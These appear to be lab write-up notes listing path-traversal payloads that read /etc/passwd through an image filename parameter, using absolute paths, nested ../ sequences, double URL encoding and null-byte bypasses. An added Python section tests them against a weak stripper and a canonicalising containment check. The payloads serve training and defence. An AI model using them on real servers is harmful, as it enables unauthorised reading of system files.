Goal: Read /etc/passwd
Lab Solutions
Lab1 - Basic:
/image?filename=../../../../../../../etc/passwd
Lab2 - Absolute Path:
/image?filename=/etc/passwd
Lab3 - Recursively removing ../:
/image?filename=....//....//....//etc/passwd
Lab4 - Wack URL Encoding:
..%252f..%252f..%252fetc%252fpasswd
[Resource for this one](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work).
Lab4 - Path Verification:
/image?filename=/var/www/images/../../../etc/passwd
Lab5 - Null Byte:
/image?filename=/../../../etc/passwd%00.png
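
For the defensive side of these labs, the following added example (not part of the original notes or of the lab code) runs each filename value above through a single-pass `../` stripper and through a handler that canonicalises the path and checks containment. The function names, the rejection of still-encoded input, and the use of `/var/www/images` as the image root are assumptions made for illustration.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/images"  # image root as it appears in the path-verification payload

# filename values from the notes, as they look after the server's one normal URL-decode
PAGE_PAYLOADS = [
    "../../../../../../../etc/passwd",
    "/etc/passwd",
    "....//....//....//etc/passwd",
    "..%2f..%2f..%2fetc%2fpasswd",          # the notes show this with %252f
    "/var/www/images/../../../etc/passwd",
    "/../../../etc/passwd\x00.png",         # the notes show this with %00
]

def naive_strip_path(filename, base_dir=BASE_DIR):
    """Weak handler (hypothetical): strips '../' in one pass, no containment check."""
    stripped = filename.replace("../", "")
    return os.path.normpath(os.path.join(base_dir, stripped))

def safe_image_path(filename, base_dir=BASE_DIR):
    """Return the canonical path if it stays under base_dir, else None."""
    if "\x00" in filename:
        return None                      # never pass NUL on to filesystem calls
    if unquote(filename) != filename:
        return None                      # still encoded: reject, do not decode again
    base = os.path.realpath(base_dir)
    # join() lets an absolute filename replace base, so check after canonicalising
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def check_page_payloads():
    """Map each payload to the safe handler's verdict."""
    return {p: safe_image_path(p) for p in PAGE_PAYLOADS}

if __name__ == "__main__":
    for payload, result in check_page_payloads().items():
        print(repr(payload), "->", result)
```

The `....//` value is not rejected by `safe_image_path`: without a stripping step it is just a directory literally named `....` inside the image root, which is why that payload only matters against the single-pass filter.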